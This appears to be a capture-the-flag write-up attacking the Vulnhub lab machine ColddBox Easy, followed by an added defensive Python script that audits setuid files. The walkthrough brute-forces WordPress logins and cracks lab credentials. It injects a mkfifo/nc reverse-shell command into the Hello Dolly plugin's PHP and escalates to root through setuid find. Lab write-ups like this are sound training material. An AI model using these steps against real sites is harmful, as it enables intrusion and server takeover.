Vulnhub target machine: ColddBox Easy
Target machine download link:
Local Kali address: 192.168.157.144
Information gathering
Find the target's IP address and the ports it has open
nmap -sP 192.168.157.144/24
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:52 CST
Nmap scan report for 192.168.157.2
Host is up (0.00060s latency).
Nmap scan report for 192.168.157.133
Host is up (0.0021s latency).
Nmap scan report for 192.168.157.144
Host is up (0.00019s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.42 seconds
The target host's IP address is .133
nmap -A 192.168.157.133 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:53 CST
Nmap scan report for 192.168.157.133
Host is up (0.00066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_ 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
The target host has ports 80 and 4512 open; port 4512 is the SSH service.
Start with port 80.
The site is built on WordPress, so query the details of this install
wpscan --url http://192.168.157.133
A scan of the back end turned up a wp-login.php login page; here I use wpscan to brute-force usernames
wpscan --url http://192.168.157.133 -e u
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Four usernames were found. I used the last three to build a username dictionary and brute-forced the wp-login form with the rockyou wordlist
wpscan --url http://192.168.157.133 -U user.txt -P /usr/share/wordlists/rockyou.txt
[SUCCESS] - c0ldd / 9876543210
One credential was cracked; really I could have stopped here. I never tried whether any other usernames and passwords could be cracked, since there was no point.
Next, log in with that user
Login succeeded, and luckily this is an administrator account.
Look around; the key part is the Plugins tab
These two appear to be plugins. I used Hello Dolly because it is simple and convenient: click Activate, then Edit, and you find it is written in PHP
<?php
// Hello Dolly plugin body as shown in the WordPress plugin editor.
// wptexturize, is_rtl and add_action are WordPress core functions.
function hello_dolly_get_lyric() {
	/** These are the lyrics to Hello Dolly */
	$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
So, take her wrap, fellas
Find her an empty lap, fellas
Dolly'll never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
Golly, gee, fellas
Find her a vacant knee, fellas
Dolly'll never go away
Dolly'll never go away
Dolly'll never go away again";

	// Here we split it into lines
	$lyrics = explode( "\n", $lyrics );

	// And then randomly choose a line
	return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}

// This just echoes the chosen line, we'll position it later
function hello_dolly() {
	$chosen = hello_dolly_get_lyric();
	echo "<p id='dolly'>$chosen</p>";
}

// Now we set that function up to execute when the admin_notices action is called
add_action( 'admin_notices', 'hello_dolly' );

// We need some CSS to position the paragraph
function dolly_css() {
	// This makes sure that the positioning is also good for right-to-left languages
	$x = is_rtl() ? 'left' : 'right';

	echo "
	<style type='text/css'>
	#dolly {
		float: $x;
		padding-$x: 15px;
		padding-top: 5px;
		margin: 0;
		font-size: 11px;
	}
	</style>
	";
}

add_action( 'admin_head', 'dolly_css' );
?>
In short, this code splits the lyrics variable into an array on newlines, then outputs a randomly chosen element of that array in the top-right corner of the admin page
GET SHELL
Add the following code to the plugin so that it connects back with a reverse shell
system("rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 192.168.157.144 1234 >/tmp/bd");
After writing it in, save, then keep refreshing the page.
Shell obtained
Privilege escalation
sudo -l does not work here, so I use find to look for other commands that have the SUID bit set
find / -perm -u=s -type f 2>/dev/null
Then I found this one
With a racing heart and trembling hands, I headed straight to the /tmp directory
www-data@ColddBox-Easy:/tmp$ touch test
touch test
www-data@ColddBox-Easy:/tmp$ find test -exec whoami \;
find test -exec whoami \;
root
Privilege escalation succeeded
www-data@ColddBox-Easy:/tmp$ find test -exec cat /root/root.txt \;
find test -exec cat /root/root.txt \;
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
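The privilege escalation above works only because find is setuid root. As an added example that is not part of the original write-up, the following Python audit is what a defender would run on a host like this one: it walks the filesystem for setuid-root regular files, flags any whose basename can run other commands or that fall outside a baseline, and emits the chmod u-s lines that would strip the bit. The EXPECTED_SUID baseline and the EXEC_CAPABLE set are constructed, illustrative assumptions to be tuned for your own build.

```python
"""Audit setuid-root files and flag those outside an expected baseline."""
import os
import stat
from typing import Dict, Iterable, List, Tuple

# Constructed baseline of setuid-root binaries normally expected on a stock
# Ubuntu host (illustrative subset; tune it for your own build).
EXPECTED_SUID = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh",
}

# Basenames of utilities that can execute other commands and therefore must
# never carry a setuid bit; find is the one this box hands out.
EXEC_CAPABLE = {"find", "bash", "sh", "dash"}

def collect_suid(root: str = "/") -> List[Tuple[str, int, int]]:
    """Walk `root` and return (path, uid, mode) for every regular setuid file."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue  # unreadable or vanished; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((path, st.st_uid, st.st_mode))
    return hits

def audit_suid(entries: Iterable[Tuple[str, int, int]]) -> Dict[str, List[str]]:
    """Classify setuid entries into dangerous / unexpected / expected buckets."""
    report: Dict[str, List[str]] = {"dangerous": [], "unexpected": [], "expected": []}
    for path, uid, _mode in entries:
        if uid != 0:
            continue  # setuid to a non-root user is out of scope here
        if os.path.basename(path) in EXEC_CAPABLE:
            report["dangerous"].append(path)
        elif path in EXPECTED_SUID:
            report["expected"].append(path)
        else:
            report["unexpected"].append(path)
    return report

def remediation(report: Dict[str, List[str]]) -> List[str]:
    """Commands for an admin to review; chmod u-s removes the setuid bit."""
    return [f"chmod u-s {p}" for p in report["dangerous"] + report["unexpected"]]

if __name__ == "__main__":
    for cmd in remediation(audit_suid(collect_suid("/usr"))):
        print(cmd)
```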
Summary
Fairly simple, but I suspect this machine has quite a few alternative routes, since a lot of things went unused: the SSH service from earlier, the hidden folder in the web root…
Also, in the final find privilege escalation, if you replace whoami with /bin/bash the privileges do not change; I don't know why...